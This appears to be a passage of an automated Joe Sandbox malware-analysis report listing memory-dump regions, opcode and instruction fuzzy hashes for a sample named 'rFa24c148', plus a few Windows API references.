                                                                                              • Opcode ID: e6293b46384808089bce60e82b9e28afda5dbf6a09f8cca8afe1e9a341c0c4a9
                                                                                              • Instruction ID: 12b6decfa5f3802ef7782f0690c119ab6e7f6a6c3e82444adf591d4e0f471267
                                                                                              • Opcode Fuzzy Hash: e6293b46384808089bce60e82b9e28afda5dbf6a09f8cca8afe1e9a341c0c4a9
                                                                                              • Instruction Fuzzy Hash: 5631B274E01218CBEB08CFAAD850ADDBBF2AF89300F64D12AD418BB354DB355946CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c8d990527e7d8782e120b8473ca5c3f3df6fe0ce95a734c728efcb90b08eaf2
                                                                                              • Instruction ID: 9cf951f59ffe12eb84b1d5a51f9ffb45facdc41ec3f63ff8cd29f70a30dda5bc
                                                                                              • Opcode Fuzzy Hash: 6c8d990527e7d8782e120b8473ca5c3f3df6fe0ce95a734c728efcb90b08eaf2
                                                                                              • Instruction Fuzzy Hash: E321CF313042024BDB186B29CC5473E66ABEFC4749F298139D406CB7A9EF75CC92D392
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 041b4ef1ed218817607dcf8e9acbca28a67181ffab3d552d0c20962db66d2010
                                                                                              • Instruction ID: 51a9c1542e1938f84c6376a67e16444c99884428a4ae57344e6f6fe22ee04e46
                                                                                              • Opcode Fuzzy Hash: 041b4ef1ed218817607dcf8e9acbca28a67181ffab3d552d0c20962db66d2010
                                                                                              • Instruction Fuzzy Hash: 3B2128B1E10225CFEB44DFB9D80499E7BF5BF88211B50857AD409EB360EB3489068B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f044102c37c89353542dbd5c94c78a4edbc6c2158e934e163c4b6cae371e1972
                                                                                              • Instruction ID: 74f27d4c36a181019f3064e23d72215085108c784b3f9c02671a79f7bb283f2b
                                                                                              • Opcode Fuzzy Hash: f044102c37c89353542dbd5c94c78a4edbc6c2158e934e163c4b6cae371e1972
                                                                                              • Instruction Fuzzy Hash: 90216D75A005159FCB24DF24C8409AE77A5EBDD768F20C029D84A9B380DB35EE47CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2968563948.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_9d000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d2fed273a17ca175bac4fd8f1438f78376e16c073a0bc67f8293d5df76b828e
                                                                                              • Instruction ID: 5e79b843cf1eb468f188a1889aac65f0388b794611244f5c98dd95b1b966a3c7
                                                                                              • Opcode Fuzzy Hash: 5d2fed273a17ca175bac4fd8f1438f78376e16c073a0bc67f8293d5df76b828e
                                                                                              • Instruction Fuzzy Hash: 67213A71544200EFCF15DF14D9C4B1ABFA5FB94314F24C56ED90A0B256C336E856E7A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2968644432.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_ad000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e465f45b2b131adf7e4a5461b880c1375d41ba2e7cbe7235dbec773054adfe37
                                                                                              • Instruction ID: e093b24075ba94f839455efcc02b0b976ce1b6fb026206e887caa5772954e2a9
                                                                                              • Opcode Fuzzy Hash: e465f45b2b131adf7e4a5461b880c1375d41ba2e7cbe7235dbec773054adfe37
                                                                                              • Instruction Fuzzy Hash: 85213771604204EFCB10CF64C9C4F26BBA1FB95314F24CA6EE94A4B741C73AD846CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a500c071d5eebc1c1c447ab343b19ea1f8f92e769caf6ee63dcafc2d3781a37
                                                                                              • Instruction ID: 6a9173952819ec9ce5e6385044f62084a851194e0ad75dea71caaba805c477ee
                                                                                              • Opcode Fuzzy Hash: 1a500c071d5eebc1c1c447ab343b19ea1f8f92e769caf6ee63dcafc2d3781a37
                                                                                              • Instruction Fuzzy Hash: CA31BE78E01208CFCB09DFA8D59489DBBF2FF49315B208069E819AB320DB31AD42CF41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c806d1bfea3be1aa80bcfad00600d15926bfdaf437c1fd08e6a24d40e9923373
                                                                                              • Instruction ID: cc39f764b0636a791761c3f0aa67cd8dd011168850adc76ea32f27a05c4d4452
                                                                                              • Opcode Fuzzy Hash: c806d1bfea3be1aa80bcfad00600d15926bfdaf437c1fd08e6a24d40e9923373
                                                                                              • Instruction Fuzzy Hash: 61216870E002489FDB04CFA5D950AEEBFBAAF49315F248069E411B72A0DB349A81DF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d032ead4aef1c9b4873e94af1a5d1fc6b7b152a4bc8e06fc70c3b2076ba693c
                                                                                              • Instruction ID: fe3e5b7494c0ce6a41999aa1908d1fc7b777de293a359d4033bf64b4dd1d808c
                                                                                              • Opcode Fuzzy Hash: 7d032ead4aef1c9b4873e94af1a5d1fc6b7b152a4bc8e06fc70c3b2076ba693c
                                                                                              • Instruction Fuzzy Hash: 1C116D74E012598FEB04DFA9D888AEDBBF5FB88314F218566E905A7341DB34E941CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e48fc96b87826befb385781ddb10bc617e50df3414cc75d6e459fa25947423f
                                                                                              • Instruction ID: 28e9565c28e88a388b595f25dd8231cdf0e14f0d64a27f59b026d52ac4e546ca
                                                                                              • Opcode Fuzzy Hash: 6e48fc96b87826befb385781ddb10bc617e50df3414cc75d6e459fa25947423f
                                                                                              • Instruction Fuzzy Hash: 71116D757002108FD704CF2AD548E5AB7E6EF88766B21847AE20A8F760CB71EC44CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9c24145f20d343866aa8d532db746c6324ba23f296ffa49f7fbd95dc37bb4b2
                                                                                              • Instruction ID: d25211bc1538e37011ace7e8dc9b5e11dd7cb37271267eaab11c1528aaf04b41
                                                                                              • Opcode Fuzzy Hash: b9c24145f20d343866aa8d532db746c6324ba23f296ffa49f7fbd95dc37bb4b2
                                                                                              • Instruction Fuzzy Hash: 79214FB0D002199FDB05DFA9D94069EBFF2FB41701F10C5B9D058AB365EB745A458B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9fe87122f58901c186a215e16fdf1b66d5ae8053a5c23f106f1d78c20375f8e0
                                                                                              • Instruction ID: 729380563ee816438c000dbcc4e84d5712a909f3bc84aef297858c609f29a75d
                                                                                              • Opcode Fuzzy Hash: 9fe87122f58901c186a215e16fdf1b66d5ae8053a5c23f106f1d78c20375f8e0
                                                                                              • Instruction Fuzzy Hash: 551126353056119FC7199B2ADC9493EB7A6FFC97513194078E80ADB760CF30DC028B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7510e730276c78cdc85202368cf66264fad4f3cc04284fd5b6e342e9d8990e07
                                                                                              • Instruction ID: 69d79a3c83d941b0ca91a342a99ac00b0ce2e691b1d9392de62cc6ed965bd590
                                                                                              • Opcode Fuzzy Hash: 7510e730276c78cdc85202368cf66264fad4f3cc04284fd5b6e342e9d8990e07
                                                                                              • Instruction Fuzzy Hash: 5201F5363141488FDB006B79E808AAEBB9ADBC4321B504537E60AC76A1DF35DD46CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d759c69f4f81888402cf22a02e2d661c2cfef88b6422f7b82355a621594fb0ff
                                                                                              • Instruction ID: 9f2dcb5da234c7c17e029adcc23073c7462bed9b024f85119fec6f9ff6c12a1e
                                                                                              • Opcode Fuzzy Hash: d759c69f4f81888402cf22a02e2d661c2cfef88b6422f7b82355a621594fb0ff
                                                                                              • Instruction Fuzzy Hash: 0411A031E002198FCB10EFBE845819EBBF6AB88351B56453AD50AA7305EF319C46CBE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a00dd2a2570cb22385f2ec85f79ce6a6905b461e7bb391297eda10dc1ff69e9c
                                                                                              • Instruction ID: e078f4dff921adede419fae729e889abc70e03bf2cbbc2ebe8cdfe1986516803
                                                                                              • Opcode Fuzzy Hash: a00dd2a2570cb22385f2ec85f79ce6a6905b461e7bb391297eda10dc1ff69e9c
                                                                                              • Instruction Fuzzy Hash: A421CE74D0520A8FCB45EFA9D8445EEBFF4FF4A300F14526AD805B7220EB355A95CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2968563948.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_9d000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02c8f471abccaf91c15cf15abd3099abb34928298146c0805963bab8260c3654
                                                                                              • Instruction ID: bb173cc5666434c91ab7c9369aabd15dfb4bed2cce48e68660a45271e641f65e
                                                                                              • Opcode Fuzzy Hash: 02c8f471abccaf91c15cf15abd3099abb34928298146c0805963bab8260c3654
                                                                                              • Instruction Fuzzy Hash: 9A112676544640CFCF02CF10D5C4B16BFB1FB94324F24C5AAD8090B216C336D85ADBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cced4879bc3fa09bf442e1c45147c91d6e59f0e3aef4f2490b8d854a2f0e36da
                                                                                              • Instruction ID: 7cc85525f94e2f5e9bf5b19414dc46ca536ab3f277fa5c481db14548d16450f3
                                                                                              • Opcode Fuzzy Hash: cced4879bc3fa09bf442e1c45147c91d6e59f0e3aef4f2490b8d854a2f0e36da
                                                                                              • Instruction Fuzzy Hash: 65114CB0E002199FDB04EFA8C98069EBBF2FB84301F10C579D058AB365EB705A468F81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2968644432.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_ad000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 369630bcfbb8dc2354fa39a610b9a4a4152f78477c6cdd78f3ce479ca549ff51
                                                                                              • Instruction ID: 4e5ee7db043a8bc169f841b978ccc51bc0d0528319632186a524875d938f2806
                                                                                              • Opcode Fuzzy Hash: 369630bcfbb8dc2354fa39a610b9a4a4152f78477c6cdd78f3ce479ca549ff51
                                                                                              • Instruction Fuzzy Hash: C811D075504244DFCB11CF50C5C4B15BBA2FB45314F24C6AED84A4B652C33AD84ACF52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0512fd7944f318f976138a0fdada20b5eace99b1e881d4c9289e6a954c855aa4
                                                                                              • Instruction ID: 9d5fb1225366e5ca434d9b190941826d26aa2c4da94df24b171acbb2914bad0d
                                                                                              • Opcode Fuzzy Hash: 0512fd7944f318f976138a0fdada20b5eace99b1e881d4c9289e6a954c855aa4
                                                                                              • Instruction Fuzzy Hash: A4012832704115AFCB15DF699C50AEF3BA7EFC8340F148026F905D7284CB369E229B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88d13f33b575fb38570afc63de87b0907be4bf9af4639492177ed210f9b87be5
                                                                                              • Instruction ID: 7bd4b8d5f28a4ace1763fca532e1282f542c35f885083e365b7fb218cc31117c
                                                                                              • Opcode Fuzzy Hash: 88d13f33b575fb38570afc63de87b0907be4bf9af4639492177ed210f9b87be5
                                                                                              • Instruction Fuzzy Hash: CE019E35E00219EFCB059F78D8189AE7BB5FF98310B004839E91AA3240EF3489158BA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 63bf202dd227e665dac3487fbe5428b9da8f72b040a320c4d09e25cade87f1b9
                                                                                              • Instruction ID: ffe505986acf68c8f0f8952faa07661acc80ef476080b4e92874f8ff5f43caa8
                                                                                              • Opcode Fuzzy Hash: 63bf202dd227e665dac3487fbe5428b9da8f72b040a320c4d09e25cade87f1b9
                                                                                              • Instruction Fuzzy Hash: 11017135A00219EF8B11AF69D84859F7BB5FF58210B40493AE91AA3241EB348916DFE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9baaec3b4cf8f314bc42c5b8641f963502b49c7bbb16914a141e93c176a6ca04
                                                                                              • Instruction ID: 3b2081895ca8bbd760142702381c0f215859dfd7e130d8121fb2dc87c32e23e2
                                                                                              • Opcode Fuzzy Hash: 9baaec3b4cf8f314bc42c5b8641f963502b49c7bbb16914a141e93c176a6ca04
                                                                                              • Instruction Fuzzy Hash: EC01A775A002189F8B10EFAED8409DFBBF5FB98351B414537E509D3211D7709A56CBE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75273ffc665e7e91a92998811dd750701ad9e05bb57e8c8bcf28f828828fd2dc
                                                                                              • Instruction ID: 3e7c79b49fc3433e9952cc245ac9f467ae48b0d2faa8f604981a3d492ff970e6
                                                                                              • Opcode Fuzzy Hash: 75273ffc665e7e91a92998811dd750701ad9e05bb57e8c8bcf28f828828fd2dc
                                                                                              • Instruction Fuzzy Hash: AEF0BB313006104BC7155A2EDC54A2EB7DEEFC9B553994079E909D7371EF21CC538B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 062593954bc52ecc4dffe75892289eeb23ac587e77683bc4605787a05db25fb0
                                                                                              • Instruction ID: 3aacec5d84841ff3c2660fbcde3119b6daae89e0124433c4325d847f2ecbb469
                                                                                              • Opcode Fuzzy Hash: 062593954bc52ecc4dffe75892289eeb23ac587e77683bc4605787a05db25fb0
                                                                                              • Instruction Fuzzy Hash: A3F0B436B441155BC7059A6AE418B5FB7AADFC4771F11047BE10AC7360DF26C8068BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 292fc3119c1c123df4317b365d8b8cf96ef3690d0040df220ebae92089dc9bf9
                                                                                              • Instruction ID: c3292cdfc15631e97c7a4fc6c2b9ac234ee5cdba803e85aee198ca25bf6697f2
                                                                                              • Opcode Fuzzy Hash: 292fc3119c1c123df4317b365d8b8cf96ef3690d0040df220ebae92089dc9bf9
                                                                                              • Instruction Fuzzy Hash: 1301E470E00329CBDF44EFB988016AEBBF5AF88200F40856AD519EB250EB3859028B95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c4e6ba723e253407303844a452727f6dac516262541baf51e5399f3f821cbfcb
                                                                                              • Instruction ID: f990ff6b8f2a6c91528fabbd476ccebb40fa71ff153675c416584cbfbe49591f
                                                                                              • Opcode Fuzzy Hash: c4e6ba723e253407303844a452727f6dac516262541baf51e5399f3f821cbfcb
                                                                                              • Instruction Fuzzy Hash: 5AF03A353002059FD700CF5AD488C5ABBEAFF88725761816AE60987730CB71AC55CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52ed6c8f547bd776032b181d6c4dc398f960fa2d90ade0e6ec05c51e0ed4f82a
                                                                                              • Instruction ID: 2cabf9fcbdf5ef7709e8163c8e2e386275a54627e9ef1f3017e626e169503251
                                                                                              • Opcode Fuzzy Hash: 52ed6c8f547bd776032b181d6c4dc398f960fa2d90ade0e6ec05c51e0ed4f82a
                                                                                              • Instruction Fuzzy Hash: 4AF01C353502148FE7089F2ADD6892A37AAEFC4B5175584A9F606CB7B1EE71DC01C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996401853.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367e0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6161befd021d4547c58a2f52433fc661ae76506db9f3127faf4e3a4366003299
                                                                                              • Instruction ID: 8e10e19ca5aca35c4daf86a7d561889b3405769763f2b53bb23afe25d92d1e42
                                                                                              • Opcode Fuzzy Hash: 6161befd021d4547c58a2f52433fc661ae76506db9f3127faf4e3a4366003299
                                                                                              • Instruction Fuzzy Hash: 63F0F8353542108FE708DA2AD854D2637EAAB8579475144A9F609CF2B1EA61DD058790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0144619a2f18fc8dcc6a43326a89382817eadef7f219a50aa74142c8a069217
                                                                                              • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                              • Opcode Fuzzy Hash: e0144619a2f18fc8dcc6a43326a89382817eadef7f219a50aa74142c8a069217
                                                                                              • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0edcf5deb36cee5dc6e3ce84a13424167710f0740ad8e5d2e3ee2c79f2a4a5e
                                                                                              • Instruction ID: b1d7de6063eb2025d87b0d8101c68b47bd06818539670fc0cb9e300f38c228d6
                                                                                              • Opcode Fuzzy Hash: a0edcf5deb36cee5dc6e3ce84a13424167710f0740ad8e5d2e3ee2c79f2a4a5e
                                                                                              • Instruction Fuzzy Hash: 21D01235E6062A968B01EBB1AD100EDB334AE95225B548616D57836150EB30665E86A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc54210d3ae8c85a7b1e8c7eb0c028ad63713f0f252a21918497178bcc712043
                                                                                              • Instruction ID: 1b7b0396a72fc5a1a620aa9f2f9c25ed21e2ae950e675ca8be1d13b8747f491a
                                                                                              • Opcode Fuzzy Hash: bc54210d3ae8c85a7b1e8c7eb0c028ad63713f0f252a21918497178bcc712043
                                                                                              • Instruction Fuzzy Hash: D3D0C937314128AB4B052A4DA8088BEBB6EEBD9771704802AF909D3301CFB29D1697E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fefbec8b4da61d02fcaaa50c6b7c4447c2f93355c8a5805c76699c0cb87a95a6
                                                                                              • Instruction ID: f5e54f4dcd619e684ab96374b5c9daed892655220186e24eb1a1360de712ae8f
                                                                                              • Opcode Fuzzy Hash: fefbec8b4da61d02fcaaa50c6b7c4447c2f93355c8a5805c76699c0cb87a95a6
                                                                                              • Instruction Fuzzy Hash: F4D04275E04109CBCB20DFA8E9844DCFBB1EF59322B60546BD929A3651D73059558F11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2fa80ddce0d24c37cdf281168387c0ce991515f49e0659849e45f0dad6ba8f7b
                                                                                              • Instruction ID: 3e2e5715061c49c4c5e8f0a6fbd74348cebca5068298ba149b43d7d5eec2bea0
                                                                                              • Opcode Fuzzy Hash: 2fa80ddce0d24c37cdf281168387c0ce991515f49e0659849e45f0dad6ba8f7b
                                                                                              • Instruction Fuzzy Hash: 56D0673AB40018AFCB049F98EC808DDF776FB98221B448116F915A3261C6319965DB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969124882.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_160000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35132f1fbb8ebb2cf18e2602a3a4ed40b8110ade4e403eec4025818fa56f7544
                                                                                              • Instruction ID: e180c2b6edf59386d60fb8dadc3a213a88ac175db963bbc6e9217d90ce721752
                                                                                              • Opcode Fuzzy Hash: 35132f1fbb8ebb2cf18e2602a3a4ed40b8110ade4e403eec4025818fa56f7544
                                                                                              • Instruction Fuzzy Hash: 41C012300043284ED605E765EC45555776EE790202740C920B0090667EDEB819864B94
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049B5
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049C0
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A0A
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A1D
